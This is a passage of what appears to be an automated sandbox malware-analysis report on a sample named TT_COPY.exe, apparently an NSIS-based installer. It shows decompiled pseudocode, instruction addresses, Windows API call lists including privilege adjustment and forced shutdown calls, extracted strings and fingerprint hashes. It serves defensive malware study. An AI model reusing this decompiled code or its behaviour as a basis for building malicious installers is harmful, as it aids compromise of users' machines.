                                                                                                                            																	E004062FD(_t202, 0x42aa28, 0);
                                                                                                                            																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                                                                            																	_t153 = E00405B20(0x42aa28);
                                                                                                                            																	__eflags = _t153;
                                                                                                                            																	if(_t153 != 0) {
                                                                                                                            																		CloseHandle(_t153);
                                                                                                                            																		_v8 = 0;
                                                                                                                            																	}
                                                                                                                            																}
                                                                                                                            															}
                                                                                                                            															L"KERNEL32::_lread(i r5, i r2, i 0x200000)" =  &(L"KERNEL32::_lread(i r5, i r2, i 0x200000)"[0]);
                                                                                                                            															_t61 =  &_v12;
                                                                                                                            															 *_t61 = _v12 - 1;
                                                                                                                            															__eflags =  *_t61;
                                                                                                                            														} while ( *_t61 != 0);
                                                                                                                            														E004062FD(_t202, _t235, 0);
                                                                                                                            														goto L67;
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            												 *_t219 = _t189;
                                                                                                                            												_t222 =  &(_t219[2]);
                                                                                                                            												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                                                                            												_t265 = _t158;
                                                                                                                            												if(_t158 == 0) {
                                                                                                                            													goto L68;
                                                                                                                            												}
                                                                                                                            												E0040653D(0x440800, _t222);
                                                                                                                            												E0040653D(0x441000, _t222);
                                                                                                                            												_v8 = _t189;
                                                                                                                            												goto L51;
                                                                                                                            											}
                                                                                                                            											asm("cdq");
                                                                                                                            											asm("cdq");
                                                                                                                            											asm("cdq");
                                                                                                                            											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                            											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                                                            											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                                                            												_t219 = _t219;
                                                                                                                            												if(_t219 >= 0x440000) {
                                                                                                                            													continue;
                                                                                                                            												}
                                                                                                                            												break;
                                                                                                                            											}
                                                                                                                            											_t189 = 0;
                                                                                                                            											goto L48;
                                                                                                                            										}
                                                                                                                            										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                                                            										lstrcatW(_t235, L"\\Temp");
                                                                                                                            										_t171 = E004034FC(_t199, _t253);
                                                                                                                            										_t254 = _t171;
                                                                                                                            										if(_t171 != 0) {
                                                                                                                            											goto L40;
                                                                                                                            										}
                                                                                                                            										GetTempPathW(0x3fc, _t235);
                                                                                                                            										lstrcatW(_t235, L"Low");
                                                                                                                            										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                                                            										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                                                            										_t176 = E004034FC(_t199, _t254);
                                                                                                                            										_t255 = _t176;
                                                                                                                            										if(_t176 == 0) {
                                                                                                                            											goto L68;
                                                                                                                            										}
                                                                                                                            										goto L40;
                                                                                                                            									}
                                                                                                                            									goto L31;
                                                                                                                            								}
                                                                                                                            								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                                                            								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                                                            									goto L29;
                                                                                                                            								}
                                                                                                                            								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                                                            								__eflags = _t178 - 0x20;
                                                                                                                            								if(_t178 == 0x20) {
                                                                                                                            									L28:
                                                                                                                            									_t36 =  &_v20;
                                                                                                                            									 *_t36 = _v20 | 0x00000004;
                                                                                                                            									__eflags =  *_t36;
                                                                                                                            									goto L29;
                                                                                                                            								}
                                                                                                                            								__eflags = _t178 - _t189;
                                                                                                                            								if(_t178 != _t189) {
                                                                                                                            									goto L29;
                                                                                                                            								}
                                                                                                                            								goto L28;
                                                                                                                            							}
                                                                                                                            							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                                                            							__eflags = _t179 - _t210;
                                                                                                                            							if(_t179 == _t210) {
                                                                                                                            								L23:
                                                                                                                            								 *0x434fa0 = 1;
                                                                                                                            								goto L24;
                                                                                                                            							}
                                                                                                                            							__eflags = _t179 - _t189;
                                                                                                                            							if(_t179 != _t189) {
                                                                                                                            								goto L24;
                                                                                                                            							}
                                                                                                                            							goto L23;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						goto L16;
                                                                                                                            					}
                                                                                                                            					do {
                                                                                                                            						L16:
                                                                                                                            						_t199 = _t199 + 2;
                                                                                                                            						__eflags =  *_t199 - _t210;
                                                                                                                            					} while ( *_t199 == _t210);
                                                                                                                            					goto L17;
                                                                                                                            				}
                                                                                                                            				goto L37;
                                                                                                                            			}















































                                                                                                                            0x0040353b
                                                                                                                            0x0040353c
                                                                                                                            0x00403543
                                                                                                                            0x00403546
                                                                                                                            0x0040354d
                                                                                                                            0x00403550
                                                                                                                            0x00403563
                                                                                                                            0x00403569
                                                                                                                            0x0040356c
                                                                                                                            0x0040356f
                                                                                                                            0x0040357d
                                                                                                                            0x00403585
                                                                                                                            0x00403590
                                                                                                                            0x004035a9
                                                                                                                            0x004035ab
                                                                                                                            0x004035b3
                                                                                                                            0x004035b3
                                                                                                                            0x004035be
                                                                                                                            0x004035c0
                                                                                                                            0x004035c0
                                                                                                                            0x004035d5
                                                                                                                            0x004035fa
                                                                                                                            0x00403608
                                                                                                                            0x0040360b
                                                                                                                            0x00403612
                                                                                                                            0x00403619
                                                                                                                            0x00403619
                                                                                                                            0x00403612
                                                                                                                            0x0040361b
                                                                                                                            0x00403620
                                                                                                                            0x00403621
                                                                                                                            0x0040362d
                                                                                                                            0x00403631
                                                                                                                            0x00403638
                                                                                                                            0x00403646
                                                                                                                            0x0040364b
                                                                                                                            0x00403652
                                                                                                                            0x00403656
                                                                                                                            0x0040365a
                                                                                                                            0x0040365c
                                                                                                                            0x0040365c
                                                                                                                            0x0040365a
                                                                                                                            0x00403663
                                                                                                                            0x0040366a
                                                                                                                            0x00403670
                                                                                                                            0x00403688
                                                                                                                            0x00403698
                                                                                                                            0x004036aa
                                                                                                                            0x004036b1
                                                                                                                            0x004036b3
                                                                                                                            0x004036b4
                                                                                                                            0x004036c5
                                                                                                                            0x004036c9
                                                                                                                            0x004036c9
                                                                                                                            0x004036dc
                                                                                                                            0x004036de
                                                                                                                            0x004037d8
                                                                                                                            0x004037d8
                                                                                                                            0x004037db
                                                                                                                            0x004037de
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004036e8
                                                                                                                            0x004036e9
                                                                                                                            0x004036ec
                                                                                                                            0x004036f5
                                                                                                                            0x004036f5
                                                                                                                            0x004036f8
                                                                                                                            0x004036fb
                                                                                                                            0x004036fe
                                                                                                                            0x00403701
                                                                                                                            0x00403701
                                                                                                                            0x00403701
                                                                                                                            0x00403702
                                                                                                                            0x00403706
                                                                                                                            0x004037c6
                                                                                                                            0x004037cf
                                                                                                                            0x004037d1
                                                                                                                            0x004037d4
                                                                                                                            0x004037d7
                                                                                                                            0x004037d7
                                                                                                                            0x004037d7
                                                                                                                            0x00000000
                                                                                                                            0x0040370c
                                                                                                                            0x0040370d
                                                                                                                            0x0040370e
                                                                                                                            0x00403712
                                                                                                                            0x0040372c
                                                                                                                            0x00403733
                                                                                                                            0x00403746
                                                                                                                            0x00403747
                                                                                                                            0x0040375c
                                                                                                                            0x00403761
                                                                                                                            0x00403763
                                                                                                                            0x00403765
                                                                                                                            0x00403781
                                                                                                                            0x00403788
                                                                                                                            0x0040379b
                                                                                                                            0x0040379c
                                                                                                                            0x004037b1
                                                                                                                            0x004037b7
                                                                                                                            0x004037b9
                                                                                                                            0x004037bb
                                                                                                                            0x004037c3
                                                                                                                            0x004037c5
                                                                                                                            0x00000000
                                                                                                                            0x004037c5
                                                                                                                            0x004037bf
                                                                                                                            0x004037c1
                                                                                                                            0x004037e6
                                                                                                                            0x004037ea
                                                                                                                            0x004037f3
                                                                                                                            0x004037f8
                                                                                                                            0x004037fe
                                                                                                                            0x00403809
                                                                                                                            0x0040380b
                                                                                                                            0x00403810
                                                                                                                            0x00403812
                                                                                                                            0x0040386a
                                                                                                                            0x0040386f
                                                                                                                            0x00403878
                                                                                                                            0x0040387f
                                                                                                                            0x00403882
                                                                                                                            0x00403a59
                                                                                                                            0x00403a59
                                                                                                                            0x00403a5e
                                                                                                                            0x00403a67
                                                                                                                            0x00403a84
                                                                                                                            0x00403afc
                                                                                                                            0x00403afc
                                                                                                                            0x00403b04
                                                                                                                            0x00403b06
                                                                                                                            0x00403b06
                                                                                                                            0x00403b0c
                                                                                                                            0x00403b0c
                                                                                                                            0x00403a9b
                                                                                                                            0x00403aa7
                                                                                                                            0x00403ab8
                                                                                                                            0x00403abf
                                                                                                                            0x00403ac6
                                                                                                                            0x00403ac6
                                                                                                                            0x00403ace
                                                                                                                            0x00403ada
                                                                                                                            0x00403ae8
                                                                                                                            0x00403af3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403adc
                                                                                                                            0x00403adc
                                                                                                                            0x00403add
                                                                                                                            0x00403adf
                                                                                                                            0x00403ae0
                                                                                                                            0x00403ae1
                                                                                                                            0x00403ae6
                                                                                                                            0x00403af5
                                                                                                                            0x00403af7
                                                                                                                            0x00000000
                                                                                                                            0x00403af7
                                                                                                                            0x00000000
                                                                                                                            0x00403ae6
                                                                                                                            0x00403ada
                                                                                                                            0x00403a71
                                                                                                                            0x00403a78
                                                                                                                            0x00403a78
                                                                                                                            0x0040388e
                                                                                                                            0x00403935
                                                                                                                            0x00403935
                                                                                                                            0x00403941
                                                                                                                            0x00000000
                                                                                                                            0x00403941
                                                                                                                            0x0040389f
                                                                                                                            0x004038a7
                                                                                                                            0x004038f9
                                                                                                                            0x004038f9
                                                                                                                            0x004038ff
                                                                                                                            0x00403906
                                                                                                                            0x00403954
                                                                                                                            0x00403956
                                                                                                                            0x0040395b
                                                                                                                            0x0040395d
                                                                                                                            0x00403965
                                                                                                                            0x00403965
                                                                                                                            0x00403970
                                                                                                                            0x0040397c
                                                                                                                            0x00403982
                                                                                                                            0x00403984
                                                                                                                            0x00403a57
                                                                                                                            0x00403a57
                                                                                                                            0x00403a57
                                                                                                                            0x00000000
                                                                                                                            0x0040398a
                                                                                                                            0x0040398a
                                                                                                                            0x0040398c
                                                                                                                            0x0040398d
                                                                                                                            0x00403996
                                                                                                                            0x0040398f
                                                                                                                            0x0040398f
                                                                                                                            0x0040398f
                                                                                                                            0x0040399c
                                                                                                                            0x004039a4
                                                                                                                            0x004039ab
                                                                                                                            0x004039b3
                                                                                                                            0x004039b3
                                                                                                                            0x004039c0
                                                                                                                            0x004039cc
                                                                                                                            0x004039d6
                                                                                                                            0x004039d6
                                                                                                                            0x004039d8
                                                                                                                            0x004039df
                                                                                                                            0x004039e9
                                                                                                                            0x004039f5
                                                                                                                            0x004039fb
                                                                                                                            0x00403a01
                                                                                                                            0x00403a04
                                                                                                                            0x00403a0e
                                                                                                                            0x00403a14
                                                                                                                            0x00403a16
                                                                                                                            0x00403a1a
                                                                                                                            0x00403a2b
                                                                                                                            0x00403a31
                                                                                                                            0x00403a36
                                                                                                                            0x00403a38
                                                                                                                            0x00403a3b
                                                                                                                            0x00403a41
                                                                                                                            0x00403a41
                                                                                                                            0x00403a38
                                                                                                                            0x00403a16
                                                                                                                            0x00403a44
                                                                                                                            0x00403a4b
                                                                                                                            0x00403a4b
                                                                                                                            0x00403a4b
                                                                                                                            0x00403a4b
                                                                                                                            0x00403a52
                                                                                                                            0x00000000
                                                                                                                            0x00403a52
                                                                                                                            0x00403984
                                                                                                                            0x00403908
                                                                                                                            0x0040390b
                                                                                                                            0x0040390f
                                                                                                                            0x00403914
                                                                                                                            0x00403916
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403922
                                                                                                                            0x0040392d
                                                                                                                            0x00403932
                                                                                                                            0x00000000
                                                                                                                            0x00403932
                                                                                                                            0x004038b0
                                                                                                                            0x004038c8
                                                                                                                            0x004038d9
                                                                                                                            0x004038da
                                                                                                                            0x004038de
                                                                                                                            0x004038e0
                                                                                                                            0x004038ee
                                                                                                                            0x004038f5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004038f5
                                                                                                                            0x004038f7
                                                                                                                            0x00000000
                                                                                                                            0x004038f7
                                                                                                                            0x0040381a
                                                                                                                            0x00403826
                                                                                                                            0x0040382b
                                                                                                                            0x00403830
                                                                                                                            0x00403832
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040383a
                                                                                                                            0x00403842
                                                                                                                            0x00403853
                                                                                                                            0x0040385b
                                                                                                                            0x0040385d
                                                                                                                            0x00403862
                                                                                                                            0x00403864
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403864
                                                                                                                            0x00000000
                                                                                                                            0x004037c1
                                                                                                                            0x0040376a
                                                                                                                            0x0040376c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040376e
                                                                                                                            0x00403772
                                                                                                                            0x00403776
                                                                                                                            0x0040377d
                                                                                                                            0x0040377d
                                                                                                                            0x0040377d
                                                                                                                            0x0040377d
                                                                                                                            0x00000000
                                                                                                                            0x0040377d
                                                                                                                            0x00403778
                                                                                                                            0x0040377b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040377b
                                                                                                                            0x00403714
                                                                                                                            0x00403718
                                                                                                                            0x0040371b
                                                                                                                            0x00403722
                                                                                                                            0x00403722
                                                                                                                            0x00000000
                                                                                                                            0x00403722
                                                                                                                            0x0040371d
                                                                                                                            0x00403720
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403720
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004036ee
                                                                                                                            0x004036ee
                                                                                                                            0x004036ef
                                                                                                                            0x004036f0
                                                                                                                            0x004036f0
                                                                                                                            0x00000000
                                                                                                                            0x004036ee
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                            • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
                                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\TT_COPY.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                            • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\TT_COPY.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                            • API String ID: 3859024572-1074725835
                                                                                                                            • Opcode ID: 0e74615daec99f27994232cf99c73b7d459649d5a28d4012cbb259fd556bc3d0
                                                                                                                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                            • Opcode Fuzzy Hash: 0e74615daec99f27994232cf99c73b7d459649d5a28d4012cbb259fd556bc3d0
                                                                                                                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E70B51BFF() {
                                                                                                                            				signed int _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				signed int _v16;
                                                                                                                            				signed int _v20;
                                                                                                                            				WCHAR* _v24;
                                                                                                                            				WCHAR* _v28;
                                                                                                                            				signed int _v32;
                                                                                                                            				signed int _v36;
                                                                                                                            				signed int _v40;
                                                                                                                            				signed int _v44;
                                                                                                                            				WCHAR* _v48;
                                                                                                                            				signed int _v52;
                                                                                                                            				void* _v56;
                                                                                                                            				intOrPtr _v60;
                                                                                                                            				WCHAR* _t208;
                                                                                                                            				signed int _t211;
                                                                                                                            				void* _t213;
                                                                                                                            				void* _t215;
                                                                                                                            				WCHAR* _t217;
                                                                                                                            				void* _t225;
                                                                                                                            				struct HINSTANCE__* _t226;
                                                                                                                            				struct HINSTANCE__* _t227;
                                                                                                                            				struct HINSTANCE__* _t229;
                                                                                                                            				signed short _t231;
                                                                                                                            				struct HINSTANCE__* _t234;
                                                                                                                            				struct HINSTANCE__* _t236;
                                                                                                                            				void* _t237;
                                                                                                                            				intOrPtr* _t238;
                                                                                                                            				void* _t249;
                                                                                                                            				signed char _t250;
                                                                                                                            				signed int _t251;
                                                                                                                            				void* _t255;
                                                                                                                            				struct HINSTANCE__* _t257;
                                                                                                                            				void* _t258;
                                                                                                                            				signed int _t260;
                                                                                                                            				signed int _t261;
                                                                                                                            				signed short* _t264;
                                                                                                                            				signed int _t269;
                                                                                                                            				signed int _t272;
                                                                                                                            				signed int _t274;
                                                                                                                            				void* _t277;
                                                                                                                            				void* _t281;
                                                                                                                            				struct HINSTANCE__* _t283;
                                                                                                                            				signed int _t286;
                                                                                                                            				void _t287;
                                                                                                                            				signed int _t288;
                                                                                                                            				signed int _t300;
                                                                                                                            				signed int _t301;
                                                                                                                            				signed short _t304;
                                                                                                                            				void* _t305;
                                                                                                                            				signed int _t309;
                                                                                                                            				signed int _t312;
                                                                                                                            				signed int _t315;
                                                                                                                            				signed int _t316;
                                                                                                                            				signed int _t317;
                                                                                                                            				signed short* _t321;
                                                                                                                            				WCHAR* _t322;
                                                                                                                            				WCHAR* _t324;
                                                                                                                            				WCHAR* _t325;
                                                                                                                            				struct HINSTANCE__* _t326;
                                                                                                                            				void* _t328;
                                                                                                                            				signed int _t331;
                                                                                                                            				void* _t332;
                                                                                                                            
                                                                                                                            				_t283 = 0;
                                                                                                                            				_v32 = 0;
                                                                                                                            				_v36 = 0;
                                                                                                                            				_v16 = 0;
                                                                                                                            				_v8 = 0;
                                                                                                                            				_v40 = 0;
                                                                                                                            				_t332 = 0;
                                                                                                                            				_v52 = 0;
                                                                                                                            				_v44 = 0;
                                                                                                                            				_t208 = E70B512BB();
                                                                                                                            				_v24 = _t208;
                                                                                                                            				_v28 = _t208;
                                                                                                                            				_v48 = E70B512BB();
                                                                                                                            				_t321 = E70B512E3();
                                                                                                                            				_v56 = _t321;
                                                                                                                            				_v12 = _t321;
                                                                                                                            				while(1) {
                                                                                                                            					_t211 = _v32;
                                                                                                                            					_v60 = _t211;
                                                                                                                            					if(_t211 != _t283 && _t332 == _t283) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					_t286 =  *_t321 & 0x0000ffff;
                                                                                                                            					_t213 = _t286 - _t283;
                                                                                                                            					if(_t213 == 0) {
                                                                                                                            						_t37 =  &_v32;
                                                                                                                            						 *_t37 = _v32 | 0xffffffff;
                                                                                                                            						__eflags =  *_t37;
                                                                                                                            						L20:
                                                                                                                            						_t215 = _v60 - _t283;
                                                                                                                            						if(_t215 == 0) {
                                                                                                                            							__eflags = _t332 - _t283;
                                                                                                                            							 *_v28 = _t283;
                                                                                                                            							if(_t332 == _t283) {
                                                                                                                            								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                                                                            								_t332 = _t255;
                                                                                                                            								 *(_t332 + 0x1010) = _t283;
                                                                                                                            								 *(_t332 + 0x1014) = _t283;
                                                                                                                            							}
                                                                                                                            							_t287 = _v36;
                                                                                                                            							_t47 = _t332 + 8; // 0x8
                                                                                                                            							_t217 = _t47;
                                                                                                                            							_t48 = _t332 + 0x808; // 0x808
                                                                                                                            							_t322 = _t48;
                                                                                                                            							 *_t332 = _t287;
                                                                                                                            							_t288 = _t287 - _t283;
                                                                                                                            							__eflags = _t288;
                                                                                                                            							 *_t217 = _t283;
                                                                                                                            							 *_t322 = _t283;
                                                                                                                            							 *(_t332 + 0x1008) = _t283;
                                                                                                                            							 *(_t332 + 0x100c) = _t283;
                                                                                                                            							 *(_t332 + 4) = _t283;
                                                                                                                            							if(_t288 == 0) {
                                                                                                                            								__eflags = _v28 - _v24;
                                                                                                                            								if(_v28 == _v24) {
                                                                                                                            									goto L42;
                                                                                                                            								}
                                                                                                                            								_t328 = 0;
                                                                                                                            								GlobalFree(_t332);
                                                                                                                            								_t332 = E70B513B1(_v24);
                                                                                                                            								__eflags = _t332 - _t283;
                                                                                                                            								if(_t332 == _t283) {
                                                                                                                            									goto L42;
                                                                                                                            								} else {
                                                                                                                            									goto L35;
                                                                                                                            								}
                                                                                                                            								while(1) {
                                                                                                                            									L35:
                                                                                                                            									_t249 =  *(_t332 + 0x1ca0);
                                                                                                                            									__eflags = _t249 - _t283;
                                                                                                                            									if(_t249 == _t283) {
                                                                                                                            										break;
                                                                                                                            									}
                                                                                                                            									_t328 = _t332;
                                                                                                                            									_t332 = _t249;
                                                                                                                            									__eflags = _t332 - _t283;
                                                                                                                            									if(_t332 != _t283) {
                                                                                                                            										continue;
                                                                                                                            									}
                                                                                                                            									break;
                                                                                                                            								}
                                                                                                                            								__eflags = _t328 - _t283;
                                                                                                                            								if(_t328 != _t283) {
                                                                                                                            									 *(_t328 + 0x1ca0) = _t283;
                                                                                                                            								}
                                                                                                                            								_t250 =  *(_t332 + 0x1010);
                                                                                                                            								__eflags = _t250 & 0x00000008;
                                                                                                                            								if((_t250 & 0x00000008) == 0) {
                                                                                                                            									_t251 = _t250 | 0x00000002;
                                                                                                                            									__eflags = _t251;
                                                                                                                            									 *(_t332 + 0x1010) = _t251;
                                                                                                                            								} else {
                                                                                                                            									_t332 = E70B5162F(_t332);
                                                                                                                            									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                                                            								}
                                                                                                                            								goto L42;
                                                                                                                            							} else {
                                                                                                                            								_t300 = _t288 - 1;
                                                                                                                            								__eflags = _t300;
                                                                                                                            								if(_t300 == 0) {
                                                                                                                            									L31:
                                                                                                                            									lstrcpyW(_t217, _v48);
                                                                                                                            									L32:
                                                                                                                            									lstrcpyW(_t322, _v24);
                                                                                                                            									goto L42;
                                                                                                                            								}
                                                                                                                            								_t301 = _t300 - 1;
                                                                                                                            								__eflags = _t301;
                                                                                                                            								if(_t301 == 0) {
                                                                                                                            									goto L32;
                                                                                                                            								}
                                                                                                                            								__eflags = _t301 != 1;
                                                                                                                            								if(_t301 != 1) {
                                                                                                                            									goto L42;
                                                                                                                            								}
                                                                                                                            								goto L31;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							if(_t215 == 1) {
                                                                                                                            								_t257 = _v16;
                                                                                                                            								if(_v40 == _t283) {
                                                                                                                            									_t257 = _t257 - 1;
                                                                                                                            								}
                                                                                                                            								 *(_t332 + 0x1014) = _t257;
                                                                                                                            							}
                                                                                                                            							L42:
                                                                                                                            							_v12 = _v12 + 2;
                                                                                                                            							_v28 = _v24;
                                                                                                                            							L59:
                                                                                                                            							if(_v32 != 0xffffffff) {
                                                                                                                            								_t321 = _v12;
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							break;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t258 = _t213 - 0x23;
                                                                                                                            					if(_t258 == 0) {
                                                                                                                            						__eflags = _t321 - _v56;
                                                                                                                            						if(_t321 <= _v56) {
                                                                                                                            							L17:
                                                                                                                            							__eflags = _v44 - _t283;
                                                                                                                            							if(_v44 != _t283) {
                                                                                                                            								L43:
                                                                                                                            								_t260 = _v32 - _t283;
                                                                                                                            								__eflags = _t260;
                                                                                                                            								if(_t260 == 0) {
                                                                                                                            									_t261 = _t286;
                                                                                                                            									while(1) {
                                                                                                                            										__eflags = _t261 - 0x22;
                                                                                                                            										if(_t261 != 0x22) {
                                                                                                                            											break;
                                                                                                                            										}
                                                                                                                            										_t321 =  &(_t321[1]);
                                                                                                                            										__eflags = _v44 - _t283;
                                                                                                                            										_v12 = _t321;
                                                                                                                            										if(_v44 == _t283) {
                                                                                                                            											_v44 = 1;
                                                                                                                            											L162:
                                                                                                                            											_v28 =  &(_v28[0]);
                                                                                                                            											 *_v28 =  *_t321;
                                                                                                                            											L58:
                                                                                                                            											_t331 =  &(_t321[1]);
                                                                                                                            											__eflags = _t331;
                                                                                                                            											_v12 = _t331;
                                                                                                                            											goto L59;
                                                                                                                            										}
                                                                                                                            										_t261 =  *_t321 & 0x0000ffff;
                                                                                                                            										_v44 = _t283;
                                                                                                                            									}
